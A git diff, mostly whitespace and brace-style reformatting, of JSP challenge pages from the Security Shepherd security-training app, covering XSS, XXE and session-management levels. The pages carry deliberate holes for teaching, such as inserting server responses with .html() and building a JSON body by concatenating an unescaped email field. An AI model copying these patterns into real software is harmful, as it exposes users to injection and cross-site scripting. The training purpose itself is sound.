-                                      style='height: 30px; display: inline-block; float: left; padding-right: 1em; overflow: hidden; width: 65%'
-                                      required></textarea>
-                        <input type="submit" id="theSubmit" value="Submit"
-                               style="height: 32;"/>
-                    </form>
-                </td>
-                <% } %>
-            </tr>
-            <%
-                }
-            %>
-        </table>
-    </div>
-    <p style="display: none;" id="loadingSign"><%=bundle.getString("form.loading")%>
-    </p>
-    <div id="resultsDiv"></div>
-    </p>
-</div>
-<script>
-    $("#submitAnswerForm").submit(function () {
-        var attemptedSolution = $("#theSubmission").val();
-        $("#resultsDiv").hide("fast");
-        $("#loadingSign").show("slow");
-        $("#theSubmit").slideUp("fast", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    theSubmission: attemptedSolution,
-                    csrfToken: "<%= csrfToken %>"
-                },
-                async: false
-            });
-            // This is to get refresh data not submit a potential answer
-            //var ajaxCall = $.ajax({
-            //	type: "GET",
-            //	url: "<%= levelHash %>?csrfToken=<%= csrfToken %>&name=//PutNameHere",
-            //	async: false
-            //});
-            $("#loadingSign").hide("fast", function () {
-                if (ajaxCall.status == 200) {
-                    $("#resultsDiv").html(ajaxCall.responseText);
-                } else {
-                    $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-                }
-                $("#resultsDiv").show("fast");
-                $("#theSubmit").slideDown("slow");
-            });
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+								style='height: 30px; display: inline-block; float: left; padding-right: 1em; overflow: hidden; width: 65%'
+								required></textarea>
+							<input type="submit" id="theSubmit" value="Submit"
+								style="height: 32;" />
+						</form>
+					</td>
+					<% } %>
+				</tr>
+				<%	
+					}
+					%>
+			</table>
+		</div>
+		<p style="display: none;" id="loadingSign"><%=bundle.getString("form.loading")%></p>
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
+	<script>
+			$("#submitAnswerForm").submit(function(){
+				var attemptedSolution = $("#theSubmission").val();
+				$("#resultsDiv").hide("fast");
+				$("#loadingSign").show("slow");
+				$("#theSubmit").slideUp("fast", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							theSubmission: attemptedSolution, 
+							csrfToken: "<%= csrfToken %>"
+						},
+						async: false
+					});
+					// This is to get refresh data not submit a potential answer
+					//var ajaxCall = $.ajax({
+					//	type: "GET",
+					//	url: "<%= levelHash %>?csrfToken=<%= csrfToken %>&name=//PutNameHere",
+					//	async: false
+					//});
+					$("#loadingSign").hide("fast", function(){
+						if(ajaxCall.status == 200)
+						{
+							$("#resultsDiv").html(ajaxCall.responseText);
+						}
+						else
+						{
+							$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+						}
+						$("#resultsDiv").show("fast");
+						$("#theSubmit").slideDown("slow");
+					});
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/challenges/ac8f3f6224b1ea3fb8a0f017aadd0d84013ea2c80e232c980e54dd753700123e.jsp b/src/main/webapp/challenges/ac8f3f6224b1ea3fb8a0f017aadd0d84013ea2c80e232c980e54dd753700123e.jsp
index 80be4ed25..c5f8a86fb 100644
--- a/src/main/webapp/challenges/ac8f3f6224b1ea3fb8a0f017aadd0d84013ea2c80e232c980e54dd753700123e.jsp
+++ b/src/main/webapp/challenges/ac8f3f6224b1ea3fb8a0f017aadd0d84013ea2c80e232c980e54dd753700123e.jsp
@@ -1,5 +1,5 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8" language="java"
-         import="utils.*, org.owasp.encoder.Encode" errorPage="" %>
+    import="utils.*, org.owasp.encoder.Encode" errorPage="" %>
 <%@ page import="java.util.Locale, java.util.ResourceBundle" %>
 <%@ page import="org.apache.logging.log4j.LogManager" %>
 <%@ page import="dbProcs.FileInputProperties" %>
@@ -34,7 +34,7 @@
     String i18nLevelName = bundle.getString("challenge.challengeName");
 
     ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
-    String owaspMoreInfo = generic.getString("module.generic.owasp.more.info");
+    String owaspMoreInfo = 	generic.getString("module.generic.owasp.more.info");
     String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
 
     ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
@@ -60,59 +60,57 @@
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%=i18nLevelName%>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%=i18nLevelName%>
+</title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= i18nLevelName %>
-    </h2>
-    <p>
-    <div id="lessonIntro">
-        <br/>
-    </div>
-    <br/>
-    <%= bundle.getString("challenge.description")
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= i18nLevelName %>
+		</h2>
+		<p>
+		<div id="lessonIntro">
+			<br />
+		</div>
+		<br />
+		<%= bundle.getString("challenge.description")
             + "<b>" + System.getProperty("user.dir") + "/"
             + FileInputProperties.readPropFileClassLoader("/fileSystemKeys.properties", "xxe.challenge.1.file") + "</b>" %>
-    <br/> <br/>
-    <form id="leFormNew" action="javascript:;"
-          contentType="application/json">
-        <table>
-            <tr>
-                <td><%= bundle.getString("paragraph.info.emailAdd") %>
-                </td>
-            </tr>
-            <tr>
-                <td><input style="width: 400px;" id="emailAddr" type="text"
-                           autocomplete="off"/></td>
-            </tr>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("button.resetPassword") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("word.info.loading") %>
-                    </p>
-                </td>
-            </tr>
-        </table>
-    </form>
+		<br /> <br />
+		<form id="leFormNew" action="javascript:;"
+			contentType="application/json">
+			<table>
+				<tr>
+					<td><%= bundle.getString("paragraph.info.emailAdd") %></td>
+				</tr>
+				<tr>
+					<td><input style="width: 400px;" id="emailAddr" type="text"
+						autocomplete="off" /></td>
+				</tr>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("button.resetPassword") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("word.info.loading") %></p>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    <div id="resultsDiv"></div>
-    </p>
-</div>
-<script>
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
+	<script>
     $("#leFormNew").submit(function () {
         $("#submitButton").hide("fast");
         $("#loadingSign").show("slow");
@@ -120,17 +118,18 @@
         $("#resultsDiv").hide("slow", function () {
             var ajaxCall = $.ajax({
                 type: "POST",
-                beforeSend: function (request) {
+                beforeSend: function(request) {
                     request.setRequestHeader("csrfToken", "<%= csrfToken %>");//don't forget the "" around the Java variable or JS will try convert
                 },
                 contentType: "application/json",
                 url: "<%= LEVEL_HASH %>",
-                data: "{ \"email\": \"" + theEmailAddr + "\" }",
+                data: "{ \"email\": \""+ theEmailAddr +"\" }",
                 async: false
             });
             if (ajaxCall.status == 200) {
                 $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
+            }
+            else {
                 $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: "
                     + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
             }
@@ -186,8 +185,8 @@
         });
     });
 </script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+	<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
diff --git a/src/main/webapp/challenges/ad2628bcc79bf10dd54ee62de148ab44b7bd028009a908ce3f1b4d019886d0e.jsp b/src/main/webapp/challenges/ad2628bcc79bf10dd54ee62de148ab44b7bd028009a908ce3f1b4d019886d0e.jsp
index 0d993790e..2df3d2e10 100644
--- a/src/main/webapp/challenges/ad2628bcc79bf10dd54ee62de148ab44b7bd028009a908ce3f1b4d019886d0e.jsp
+++ b/src/main/webapp/challenges/ad2628bcc79bf10dd54ee62de148ab44b7bd028009a908ce3f1b4d019886d0e.jsp
@@ -1,144 +1,153 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java"
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    // Cross Site Scripting Challenge 3
+// Cross Site Scripting Challenge 3
 /**
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
- *
+ * 
  * @author Mark Denihan
  */
-    String levelHash = new String("ad2628bcc79bf10dd54ee62de148ab44b7bd028009a908ce3f1b4d019886d0e");
-    String levelName = new String("XSS Challange 3");
-    //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.xss." + levelHash, locale);
-    //Used more than once translations
-    String translatedLevelName = bundle.getString("challenge.challengeName");
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-            // Getting Session Variables
-            //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
-
-            String csrfToken = Encode.forHtml(tokenCookie.getValue());
+ String levelHash = new String("ad2628bcc79bf10dd54ee62de148ab44b7bd028009a908ce3f1b4d019886d0e");
+ String levelName = new String("XSS Challange 3");
+ //Translation Stuff
+ Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.xss." + levelHash, locale);
+ //Used more than once translations
+ String translatedLevelName = bundle.getString("challenge.challengeName");
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+ if (request.getSession() != null)
+ {
+ 	HttpSession ses = request.getSession();
+ 	//Getting CSRF Token from client
+ 	Cookie tokenCookie = null;
+ 	try
+ 	{
+ 		tokenCookie = Validate.getToken(request.getCookies());
+ 	}
+ 	catch(Exception htmlE)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ 	}
+ 	// validateSession ensures a valid session, and valid role credentials
+ 	// If tokenCookie == null, then the page is not going to continue loading
+ 	if (Validate.validateSession(ses) && tokenCookie != null)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ 		// Getting Session Variables
+		//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
+		
+		String csrfToken = Encode.forHtml(tokenCookie.getValue());
 %>
 
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= translatedLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= translatedLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= translatedLevelName %>
-    </h2>
-    <p>
-            <%= bundle.getString("challenge.description") %>
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td><%= bundle.getString("challenge.form.instruction") %>
-                </td>
-            </tr>
-            <tr>
-                <td><input style="width: 400px;" id="searchTerm" type="text"/>
-                </td>
-            </tr>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("challenge.form.getUser") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %>...
-                    </p>
-                    <div style="display: none;" id="hintButton">
-                        <input type="button" value="<%= bundle.getString("sign.hint") %>"
-                               id="theHintButton"/>
-                    </div>
-                </td>
-            </tr>
-        </table>
-    </form>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= translatedLevelName %></h2>
+		<p>
+			<%= bundle.getString("challenge.description") %>
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td><%= bundle.getString("challenge.form.instruction") %></td>
+				</tr>
+				<tr>
+					<td><input style="width: 400px;" id="searchTerm" type="text" />
+					</td>
+				</tr>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("challenge.form.getUser") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %>...
+						</p>
+						<div style="display: none;" id="hintButton">
+							<input type="button" value="<%= bundle.getString("sign.hint") %>"
+								id="theHintButton" />
+						</div>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    <div id="resultsDiv"></div>
-    </p>
-</div>
-<script>
-    $("#leForm").submit(function () {
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        var theSearchTerm = $("#searchTerm").val();
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                dataType: "text",
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    searchTerm: theSearchTerm,
-                    csrfToken: "<%= csrfToken %>"
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
+	<script>
+			$("#leForm").submit(function(){
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				var theSearchTerm = $("#searchTerm").val();
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						dataType: "text",
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							searchTerm: theSearchTerm,
+							csrfToken: "<%= csrfToken %>"
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/challenges/b5e1020e3742cf2c0880d4098146c4dde25ebd8ceab51807bad88ff47c316ece.jsp b/src/main/webapp/challenges/b5e1020e3742cf2c0880d4098146c4dde25ebd8ceab51807bad88ff47c316ece.jsp
index 88ca2597d..aec687e41 100644
--- a/src/main/webapp/challenges/b5e1020e3742cf2c0880d4098146c4dde25ebd8ceab51807bad88ff47c316ece.jsp
+++ b/src/main/webapp/challenges/b5e1020e3742cf2c0880d4098146c4dde25ebd8ceab51807bad88ff47c316ece.jsp
@@ -1,254 +1,262 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    // Broken Authentication and Session Management Challenge Six
+// Broken Authentication and Session Management Challenge Six
 
 /**
  * <br/><br/>
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
  *
  * @author Mark Denihan
  */
 
-    String levelName = "Session Management Challenge Six";
-    String levelHash = "b5e1020e3742cf2c0880d4098146c4dde25ebd8ceab51807bad88ff47c316ece";
+String levelName = "Session Management Challenge Six";
+String levelHash = "b5e1020e3742cf2c0880d4098146c4dde25ebd8ceab51807bad88ff47c316ece";
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.sessionManagement." + levelHash, locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.sessionManagement." + levelHash, locale);
 //Used more than once translations
-    String i18nLevelName = bundle.getString("challenge.challengeName");
+String i18nLevelName = bundle.getString("challenge.challengeName");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+ 	HttpSession ses = request.getSession();
+ 	//Getting CSRF Token from client
+ 	Cookie tokenCookie = null;
+ 	try
+ 	{
+ 		tokenCookie = Validate.getToken(request.getCookies());
+ 	}
+ 	catch(Exception htmlE)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ 	}
+ 	// validateSession ensures a valid session, and valid role credentials
+ 	// If tokenCookie == null, then the page is not going to continue loading
+ 	if (Validate.validateSession(ses) && tokenCookie != null)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= i18nLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= i18nLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= i18nLevelName %>
-    </h2>
-    <p>
-            <%= bundle.getString("challenge.description") %>
-        <br/>
-    <form id="leForm" action="javascript:;">
-        <div id="resultsDiv">
-            <table>
-                <tr>
-                    <td><%= bundle.getString("challenge.form.userName") %>
-                    </td>
-                    <td><input type="text" id="subName"/></td>
-                </tr>
-                <tr>
-                    <td><%= bundle.getString("challenge.form.password") %>
-                    </td>
-                    <td><input type="password" id="subPassword"/></td>
-                </tr>
-                <tr>
-                    <td colspan="2">
-                        <div id="submitButton">
-                            <input type="submit"
-                                   value="<%= bundle.getString("challenge.form.signIn") %>"/>
-                        </div>
-                    </td>
-                </tr>
-            </table>
-        </div>
-        <small><a id="forgottenPasswordLink" href="#"><%= bundle.getString("challenge.form.forgotPassword") %>
-        </a></small>
-    </form>
-    <p style="display: none;" id="loadingSign"><%= bundle.getString("challenge.form.loading") %>
-    </p>
-    <br/>
-    <div id="forgottenPassDiv" style="display: none;">
-        <form id="leForm2" action="javascript:;">
-            <h2 class='title'><%= bundle.getString("question.header") %>
-            </h2>
-            <p>
-                <%= bundle.getString("question.whatToDo") %>
-            </p>
-            <table>
-                <tr>
-                    </td>
-                    <div id="resetSubmit">
-                        <input id="resetEmail" type="text" width="300px"
-                               autocomplete="off"/><input type="submit"
-                                                          value="<%= bundle.getString("question.form.getQuestion") %>"/>
-                    </div>
-                    <p style="display: none;" id="resetLoadingSign"><%= bundle.getString("challenge.form.loading") %>
-                    </p>
-                    </td>
-                </tr>
-            </table>
-        </form>
-        <div id="resultsDiv2"></div>
-        <div id="answerQuestionDiv" style="display: none;">
-            <form id="leForm3" action="javascript:;">
-                <table>
-                    <tr>
-                        </td>
-                        <div id="answerQuestion">
-                            <input id="questionAnswer" type="text" width="300px"
-                                   autocomplete="off"/><input type="submit"
-                                                              value="<%= bundle.getString("question.form.giveAnswer") %>"/>
-                        </div>
-                        <p style="display: none;"
-                           id="answerLoadingSign"><%= bundle.getString("challenge.form.loading") %>
-                        </p>
-                        </td>
-                    </tr>
-                </table>
-            </form>
-        </div>
-        <div id="resultsDiv3"></div>
-    </div>
-
-
-    </p>
-</div>
-<script>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= i18nLevelName %></h2>
+		<p>
+			<%= bundle.getString("challenge.description") %>
+			<br />
+		<form id="leForm" action="javascript:;">
+			<div id="resultsDiv">
+				<table>
+					<tr>
+						<td><%= bundle.getString("challenge.form.userName") %></td>
+						<td><input type="text" id="subName" /></td>
+					</tr>
+					<tr>
+						<td><%= bundle.getString("challenge.form.password") %></td>
+						<td><input type="password" id="subPassword" /></td>
+					</tr>
+					<tr>
+						<td colspan="2">
+							<div id="submitButton">
+								<input type="submit"
+									value="<%= bundle.getString("challenge.form.signIn") %>" />
+							</div>
+						</td>
+					</tr>
+				</table>
+			</div>
+			<small><a id="forgottenPasswordLink" href="#"><%= bundle.getString("challenge.form.forgotPassword") %></a></small>
+		</form>
+		<p style="display: none;" id="loadingSign"><%= bundle.getString("challenge.form.loading") %></p>
+		<br />
+		<div id="forgottenPassDiv" style="display: none;">
+			<form id="leForm2" action="javascript:;">
+				<h2 class='title'><%= bundle.getString("question.header") %></h2>
+				<p>
+					<%= bundle.getString("question.whatToDo") %>
+				</p>
+				<table>
+					<tr>
+						</td>
+						<div id="resetSubmit">
+							<input id="resetEmail" type="text" width="300px"
+								autocomplete="off" /><input type="submit"
+								value="<%= bundle.getString("question.form.getQuestion") %>" />
+						</div>
+						<p style="display: none;" id="resetLoadingSign"><%= bundle.getString("challenge.form.loading") %></p>
+						</td>
+					</tr>
+				</table>
+			</form>
+			<div id="resultsDiv2"></div>
+			<div id="answerQuestionDiv" style="display: none;">
+				<form id="leForm3" action="javascript:;">
+					<table>
+						<tr>
+							</td>
+							<div id="answerQuestion">
+								<input id="questionAnswer" type="text" width="300px"
+									autocomplete="off" /><input type="submit"
+									value="<%= bundle.getString("question.form.giveAnswer") %>" />
+							</div>
+							<p style="display: none;" id="answerLoadingSign"><%= bundle.getString("challenge.form.loading") %></p>
+							</td>
+						</tr>
+					</table>
+				</form>
+			</div>
+			<div id="resultsDiv3"></div>
+		</div>
 
-    $("#leForm").submit(function () {
-        var theSubName = $("#subName").val();
-        var theSubPassword = $("#subPassword").val();
-        $("#loadingSign").show("slow");
-        $("#forgottenPassDiv").hide("slow");
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    subName: theSubName,
-                    subPassword: theSubPassword
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#loadingSign").hide("fast", function () {
-                $("#resultsDiv").show("slow");
-            });
-        });
-    });
 
-    $("#leForm2").submit(function () {
-        var theResetEmail = $("#resetEmail").val();
-        $("#resetSubmit").hide("fast");
-        $("#resetLoadingSign").show("slow");
-        $("#resultsDiv2").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "GET",
-                url: "<%= levelHash %>SecretQuestion",
-                data: {
-                    subEmail: theResetEmail
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv2").html("<p>" + ajaxCall.responseText + "</p>");
-            } else {
-                $("#resultsDiv2").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv2").show("slow", function () {
-                $("#resetLoadingSign").hide("fast", function () {
-                    $("#resetSubmit").show("slow");
-                    $("#answerQuestionDiv").show("slow");
-                });
-            });
-        });
-    });
-
-    $("#leForm3").submit(function () {
-        var theResetEmail = $("#resetEmail").val();
-        var theAnswer = $("#questionAnswer").val();
